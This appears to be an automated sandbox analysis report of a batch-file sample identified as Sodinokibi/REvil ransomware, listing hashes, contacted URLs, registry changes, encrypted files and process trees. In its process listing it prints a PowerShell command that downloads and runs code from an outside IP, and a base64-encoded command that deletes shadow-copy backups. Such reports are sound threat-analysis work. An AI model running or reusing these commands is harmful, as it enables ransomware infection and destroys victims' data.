Analysis
-
max time kernel
141s -
max time network
158s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
01-05-2020 13:10
Static task
static1
Behavioral task
behavioral1
Sample
46MBBJZz.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
46MBBJZz.bat
Resource
win10v200430
General
-
Target
46MBBJZz.bat
-
Size
189B
-
MD5
c7b71aa9749be55225b17bbaf4b4b9a1
-
SHA1
ec46d8385341aa2152b70d834c898c5fd9c82284
-
SHA256
ca27de823967366e96e0623a33820b1713b1e19439c82d81fe6521e04da48dcb
-
SHA512
3c0c57b1384957bcf30d3c079c6fc7c4a48be99a2148490e078eaa1809dd87d2e5f047f457cc8c9f2e6518f5ef8177d73f739c27076f45ec5deae04be4590e8d
Malware Config
Extracted
http://185.103.242.78/pastes/46MBBJZz
Extracted
C:\12361-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8CCF28A78ADBB62E
http://decryptor.cc/8CCF28A78ADBB62E
Signatures
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1400 wrote to memory of 1480 1400 cmd.exe powershell.exe PID 1480 wrote to memory of 1660 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1660 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1660 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1660 1480 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1660 powershell.exe 1660 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\iay8505mx.bmp" powershell.exe -
Makes http(s) request 41 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 277 https://365questions.org/news/assets/ysnzfpyd.gif HTTP URL 14 https://alsace-first.com/static/graphic/xd.png HTTP URL 210 https://www.citymax-cr.com/include/graphic/oipvyaydawyh.jpg HTTP URL 262 http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt HTTP URL 248 https://hrabritelefon.hr/admin/tmp/mdpivdqd.jpg HTTP URL 271 https://www.tetinfo.in/ HTTP URL 16 http://apps.identrust.com/roots/dstrootcax3.p7c HTTP URL 240 https://latestmodsapks.com/cgi-sys/suspendedpage.cgi HTTP URL 246 https://theduke.de/uploads/tmp/gdip.jpg HTTP URL 18 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP URL 100 https://braffinjurylawfirm.com/content/pics/euwfipvt.jpg HTTP URL 98 https://alysonhoward.com/content/graphic/glaqgyyycmwv.gif HTTP URL 104 https://dw-css.de/news/graphic/mpal.gif HTTP URL 192 https://dontpassthepepper.com/wp-content/graphic/qcazjqtpkx.jpg HTTP URL 275 https://chavesdoareeiro.com/include/graphic/pgkbtsmm.jpg HTTP URL 279 https://newstap.com.ng/admin/graphic/juxo.png HTTP URL 180 https://ladelirante.fr/uploads/tmp/iduirdbr.jpg HTTP URL 42 https://sporthamper.com/data/temp/irgwma.gif HTTP URL 64 https://smartypractice.com/uploads/images/hnowxgmt.jpg HTTP URL 269 https://tetinfo.in/static/images/eg.png HTTP URL 51 https://dirittosanitario.biz/data/images/yklhziiwzwwv.jpg HTTP URL 140 https://brandl-blumen.de/include/images/fxezgtnbtt.jpg HTTP URL 187 https://tecnojobsnet.com/static/assets/kevpwaja.gif HTTP URL 244 https://interactcenter.org/static/graphic/qgbmdvxcnbay.jpg HTTP URL 256 https://hoteledenpadova.it/wp-content/game/uaramq.png HTTP URL 53 https://socialonemedia.com/content/image/vsdw.png HTTP URL 183 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP URL 109 https://c-a.co.in/static/tmp/mzps.gif HTTP URL 182 https://evologic-technologies.com/admin/graphic/nzgj.png HTTP URL 208 https://citymax-cr.com/include/graphic/oipvyaydawyh.jpg HTTP URL 239 https://latestmodsapks.com/content/images/cqgr.jpg HTTP URL 264 https://work2live.de/static/pics/vtkpactifn.png HTTP URL 9 https://www.educar.org/ HTTP URL 84 https://ivfminiua.com/include/images/tfcztxmiyb.gif HTTP URL 143 https://despedidascostablanca.es/static/temp/hdoq.png HTTP URL 219 https://bristolaeroclub.co.uk/news/images/ukla.jpg HTTP URL 221 https://www.bristolaeroclub.co.uk/news/images/ukla.jpg HTTP URL 214 https://videomarketing.pro/static/graphic/mlhj.gif HTTP URL 2 http://185.103.242.78/pastes/46MBBJZz HTTP URL 7 https://educar.org/include/images/tkaeigjwav.png HTTP URL 82 https://berliner-versicherungsvergleich.de/bausparen/ -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 36 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\DismountOptimize.7z powershell.exe File opened for modification \??\c:\program files\LimitUpdate.wav powershell.exe File created \??\c:\program files\microsoft sql server compact edition\12361-readme.txt powershell.exe File opened for modification \??\c:\program files\RedoRestore.ini powershell.exe File opened for modification \??\c:\program files\SubmitRead.jtx powershell.exe File opened for modification \??\c:\program files\UnregisterReceive.mpg powershell.exe File created \??\c:\program files\12361-readme.txt powershell.exe File opened for modification \??\c:\program files\MeasureTrace.js powershell.exe File opened for modification \??\c:\program files\UninstallExpand.mp2v powershell.exe File opened for modification \??\c:\program files\UnpublishRepair.xls powershell.exe File created \??\c:\program files (x86)\12361-readme.txt powershell.exe File opened for modification \??\c:\program files\MeasureInitialize.3gp powershell.exe File opened for modification \??\c:\program files\NewHide.ini powershell.exe File opened for modification \??\c:\program files\StepMerge.mp4 powershell.exe File opened for modification \??\c:\program files\SyncResize.emf powershell.exe File opened for modification \??\c:\program files\AddResize.M2V powershell.exe File opened for modification \??\c:\program files\RedoPing.mp4 powershell.exe File opened for modification \??\c:\program files\SearchLock.jpg powershell.exe File opened for modification \??\c:\program files\UninstallEnable.3g2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\12361-readme.txt powershell.exe File opened for modification \??\c:\program files\TraceCheckpoint.vsx powershell.exe File opened for modification \??\c:\program files\ApproveEnter.vst powershell.exe File opened for modification \??\c:\program files\BackupLimit.rtf powershell.exe File opened for modification \??\c:\program files\CompareAssert.potm powershell.exe File opened for modification \??\c:\program files\MeasureLock.TTS powershell.exe File opened for modification \??\c:\program files\OutCheckpoint.xltm powershell.exe File opened for modification \??\c:\program files\SaveDisconnect.avi powershell.exe File opened for modification \??\c:\program files\SaveProtect.xlsm powershell.exe File opened for modification \??\c:\program files\DisableFind.MTS powershell.exe File opened for modification \??\c:\program files\JoinConvertFrom.mp3 powershell.exe File opened for modification \??\c:\program files\SuspendConvertFrom.xla powershell.exe File opened for modification \??\c:\program files\UndoAssert.ex_ powershell.exe File opened for modification \??\c:\program files\WatchSend.vstm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\12361-readme.txt powershell.exe File opened for modification \??\c:\program files\ExpandSwitch.xlsm powershell.exe File opened for modification \??\c:\program files\SplitPublish.docm powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1480 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1660 powershell.exe Token: SeBackupPrivilege 1568 vssvc.exe Token: SeRestorePrivilege 1568 vssvc.exe Token: SeAuditPrivilege 1568 vssvc.exe Token: SeTakeOwnershipPrivilege 1480 powershell.exe -
Blacklisted process makes network request 159 IoCs
Processes:
powershell.exeflow pid process 2 1480 powershell.exe 7 1480 powershell.exe 9 1480 powershell.exe 11 1480 powershell.exe 12 1480 powershell.exe 14 1480 powershell.exe 16 1480 powershell.exe 18 1480 powershell.exe 20 1480 powershell.exe 21 1480 powershell.exe 23 1480 powershell.exe 25 1480 powershell.exe 26 1480 powershell.exe 28 1480 powershell.exe 29 1480 powershell.exe 31 1480 powershell.exe 32 1480 powershell.exe 34 1480 powershell.exe 36 1480 powershell.exe 37 1480 powershell.exe 39 1480 powershell.exe 40 1480 powershell.exe 42 1480 powershell.exe 45 1480 powershell.exe 47 1480 powershell.exe 49 1480 powershell.exe 51 1480 powershell.exe 53 1480 powershell.exe 55 1480 powershell.exe 56 1480 powershell.exe 58 1480 powershell.exe 59 1480 powershell.exe 61 1480 powershell.exe 62 1480 powershell.exe 64 1480 powershell.exe 66 1480 powershell.exe 67 1480 powershell.exe 69 1480 powershell.exe 70 1480 powershell.exe 72 1480 powershell.exe 74 1480 powershell.exe 76 1480 powershell.exe 79 1480 powershell.exe 81 1480 powershell.exe 82 1480 powershell.exe 84 1480 powershell.exe 86 1480 powershell.exe 87 1480 powershell.exe 89 1480 powershell.exe 90 1480 powershell.exe 92 1480 powershell.exe 93 1480 powershell.exe 96 1480 powershell.exe 98 1480 powershell.exe 100 1480 powershell.exe 102 1480 powershell.exe 104 1480 powershell.exe 106 1480 powershell.exe 107 1480 powershell.exe 109 1480 powershell.exe 111 1480 powershell.exe 112 1480 powershell.exe 114 1480 powershell.exe 115 1480 powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 powershell.exe -
Enumerates connected drives 3 TTPs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\46MBBJZz.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/46MBBJZz');Invoke-ECMOWU;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Modifies system certificate store
PID:1480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1568